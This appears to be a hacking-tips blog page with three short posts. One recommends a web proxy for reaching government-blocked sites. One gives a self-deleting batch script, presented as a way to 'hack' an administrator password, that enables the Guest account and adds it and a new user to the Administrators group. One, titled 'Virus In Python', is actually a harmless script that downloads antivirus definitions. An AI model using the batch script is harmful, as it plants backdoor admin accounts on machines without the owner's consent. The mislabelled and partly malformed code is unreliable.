Open Burned Sites

06:33 ---

Open Burned Sites

There are many sites which are blocked by government because of breaking laws of their country. The user downloads many softwares to open these sites but end up being infected by  malware, virus. Today i will share a trick with you guys which can help you easily open these banned sites without downloading anything. As you know that there are many online proxies but everyone need a proxy server which is faster and trusted. Here in this post I am revealing an online proxy and a tutorial to open banned sites with the help of these online proxies which is trusted and fast. Just follow my step to open 

1. Open www.incloak.com in your browser.

2. After enter the url of which you want to openlike below
3.Now Click Hide Me button and Enjoy...
   
                                   ....Give Comments....

Hack Administrtor Password

06:17 ---

Hack Administrator password



1.Right click and open a text document and type the below code

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

Virus In Python

06:33 ---

Virus In Python


#!/usr/bin/python
 
import time
import re
import glob
import os
from urllib import urlopen
from datetime import date
from sgmllib import SGMLParser
 
class URLLister(SGMLParser):
    def reset(self):
        SGMLParser.reset(self)
        self.url = ""
 
    def start_a(self, attrs):
        href = attrs[0][1]
        if href:
        self.url = href
 
def delete_old():
    # Delete old file
    print "Removing any old files..."
    search_path = '/home/cpowell/Desktop/'
    old_files = glob.glob(search_path + '*.jdb')
    for found in old_files:
        print "t...%s deleted." % found
        os.remove(found)
 
# Open everything
print "Checking for new definitions..."
currentDate = date.today().strftime('%d-%b-%Y')
url = "http://definitions.symantec.com/defs/jdb/"
file_found = False
site = urlopen(url)
parser = URLLister()
s = site.readlines()
for line in s:
    if re.search(currentDate, line):
        parser.feed(line)
        file_found = True
site.close()
parser.close()
if file_found:
    delete_old()
    #Download the file
    print "Downloading the new virus definitions, please wait..."
    dl = urlopen(url + parser.url)
    newfile = open('/home/cpowell/Desktop/' + currentDate + "_" + parser.url, 'w')
    newfile.write(dl.read())
    newfile.close()
    dl.close()
else:
    print "No new virus definitions found."
 
print "Done."